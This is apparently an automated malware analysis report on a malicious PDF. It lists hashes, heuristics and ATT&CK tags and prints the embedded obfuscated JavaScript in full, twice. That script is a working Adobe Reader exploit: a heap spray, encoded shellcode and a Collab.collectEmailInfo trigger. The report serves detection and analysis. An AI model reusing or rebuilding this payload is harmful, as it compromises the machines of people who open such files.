Malicious PDF — malware analysis report

Static analysis result for SHA-256 2036ea8f6526517f…

MALICIOUS

PDF

6.6 KB Created: 2008-09-07 22:47:39 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2012-07-12
MD5: 6fbd44fdbd6c410776c45d960d255271 SHA-1: 7ed5f497be1c308cd51dbb11d8c4bf4ad2d14cef SHA-256: 2036ea8f6526517f2de847c0826561ba4811c2b64e4c0d63760098a617f0220f
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1027 Obfuscated Files or Information

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of an eval() call within the JavaScript stream (PDF_EVAL) strongly suggests that the script is designed to execute arbitrary code, likely to download and run a second-stage payload. The script itself is obfuscated, as noted by the EXTRACTED_FILE_STATIC_TRIAGE heuristic, making its exact function difficult to determine without further deobfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    stream
    $str = "v"+"ar x"+"='76"+"6172204444704E56446658203D206E657720417272617928293B66756E63"+"74696F6E206B7A56304969764C2872715959306F306D2C204E3174544155"+"4948297B097768696C65202872715959306F306D2E6C656E6774682A323C"+"4E3174544155494829207B090972715959306F306D202B3D207271595930"+"6F306D3B097D0972715959306F306D203D2072715959306F306D2E737562"+"737472696E6728302C4E317454415549482F32293B0972657475726E2072"+"715959306F306D3B7D66756E6374696F6E205333474243524E5528297B09"+"766172206563426366646F4D203D20307 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x38E 5227 bytes
SHA-256: 91b5664f0e563851bfd1d82e20cf893c0616406387cc26b9ef72fbbcff4ebe0f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
$str = "v"+"ar x"+"='76"+"6172204444704E56446658203D206E657720417272617928293B66756E63"+"74696F6E206B7A56304969764C2872715959306F306D2C204E3174544155"+"4948297B097768696C65202872715959306F306D2E6C656E6774682A323C"+"4E3174544155494829207B090972715959306F306D202B3D207271595930"+"6F306D3B097D0972715959306F306D203D2072715959306F306D2E737562"+"737472696E6728302C4E317454415549482F32293B0972657475726E2072"+"715959306F306D3B7D66756E6374696F6E205333474243524E5528297B09"+"766172206563426366646F4D203D20307830633063306330633B09766172"+"206272495731795459203D20756E65736361706528222575343334332575"+"343334332575343334332575304645422575333335422575363643392575"+"383042392575383030312575454633332575453234332575454246412575"+"453830352575464645432575464646462575384237462575444634452575"+"454645462575363445462575453341462575394636342575343246332575"+"394636342575364545372575454630332575454645422575363445462575"+"423930332575363138372575453141312575303730332575454631312575"+"454645462575414136362575423945422575373738372575363531312575"+"303745312575454631462575454645462575414136362575423945372575"+"434138372575313035462575303732442575454630442575454645462575"+"414136362575423945332575303038372575304632312575303738462575"+"454633422575454645462575414136362575423946462575324538372575"+"304139362575303735372575454632392575454645462575414136362575"+"414646422575443736462575394132432575363631352575463741412575"+"453830362575454645452575423145462575394136362575363443422575"+"454241412575454538352575363442362575463742412575303742392575"+"454636342575454645462575383742462575463544392575394643302575"+"373830372575454645462575363645462575463341412575324136342575"+"324636432575363642462575434641412575313038372575454645462575"+"424645462575414136342575383546422575423645442575424136342575"+"303746372575454638452575454645462575414145432575323843462575"+"423345462575433139312575323838412575454241462575384139372575"+"454645462575394131302575363443462575453341412575454538352575"+"363442362575463742412575414630372575454645462575383545462575"+"423745382575414145432575444343422575424333342575313042432575"+"434639412575424342462575414136342575383546332575423645412575"+"424136342575303746372575454643432575454645462575454638352575"+"394131302575363443462575453741412575454438352575363442362575"+"463742412575464630372575454645462575383545462575363431302575"+"464641412575454538352575363442362575463742412575454630372575"+"454645462575414545462575424442342575304545432575304545432575"+"304545432575304545432575303336432575423545422575363442432575"+"304433352575424431382575304631302575363442412575363430332575"+"453739322575423236342575423945332575394336342575363444332575"+"463139422575454339372575423931432575393936342575454343462575"+"444331432575413632362575343241452575324345432575444342392575"+"453031392575464635312575314444352575453739422575323132452575"+"454345322575414631442575314530342575313144342575394142312575"+"423530412575303436342575423536342575454343422575383933322575"+"453336342575363441342575463342352575333245432575454236342575"+"454336342575423132412575324442322575454645372575314230372575"+"313031312575424131302575413342442575413041322575454641312575"+"373436382575373037342575324633412575363332462575363136392575"+"363336452575363136392575364632452575363737322575363832462575"+"364336352575324637302575324637412575373836352575373032452575"+"3730363825753638334625753730334425753230363422293B0976617220"+"565741627A785550203D2030783430303030303B097661722057436F4559"+"46646F203D2062724957317954592E6C656E677468202A20323B09766172"+"204E31745441554948203D20565741627A785550202D202857436F455946"+"646F2B30783338293B097661722072715959306F306D203D20756E657363"+"617065282225753930393025753930393022293B0972715959306F306D20"+"3D206B7A56304969764C2872715959306F306D2C204E3174544155494829"+"3B09766172206A70775A41374566203D20286563426366646F4D202D2030"+"78343030303030292F565741627A7855503B0909666F7220287661722078"+"457A5969624B733D303B78457A5969624B733C6A70775A413745663B7845"+"7A5969624B732B2B29207B09094444704E564466585B78457A5969624B73"+"5D203D2072715959306F306D202B2062724957317954593B097D7D66756E"+"6374696F6E20517939514452677528297B09766172204650556B6355354E"+"203D206170702E76696577657256657273696F6E2E746F537472696E6728"+"293B094650556B6355354E203D204650556B6355354E2E7265706C616365"+"282F5C442F672C2727293B0976617220576C486D5277636B203D206E6577"+"2041727261792809094650556B6355354E2E6368617241742830292C0909"+"4650556B6355354E2E6368617241742831292C09094650556B6355354E2E"+"636861724174283229293B0969662028092020202028576C486D5277636B"+"5B305D203D3D203720262620576C486D5277636B5B315D203C2031290920"+"29207B09095333474243524E5528293B0909766172205954444E50487743"+"203D20756E657363617065282225753063306325753063306322293B0909"+"7768696C65285954444E504877432E6C656E677468203C20343439353229"+"205954444E50487743202B3D205954444E504877433B0909746869732E63"+"6F6C6C616253746F7265203D20436F6C6C61622E636F6C6C656374456D61"+"696C496E666F287B7375626A3A2022222C6D73673A205954444E50487743"+"7D293B097D7D517939514452677528293B'; v"+"ar o=''; f"+"or"+"(i"+"=0;i<x.l"+"en"+"gth;i=i+2) { var c=St"+"ri"+"ng.fr"+"omC"+"har"+"Co"+"de(3"+"7); o=o+c+x.su"+"bst"+"r(i,2); } e"+"v"+"a"+"l(un"+"es"+"cap"+"e(o));";eval($str);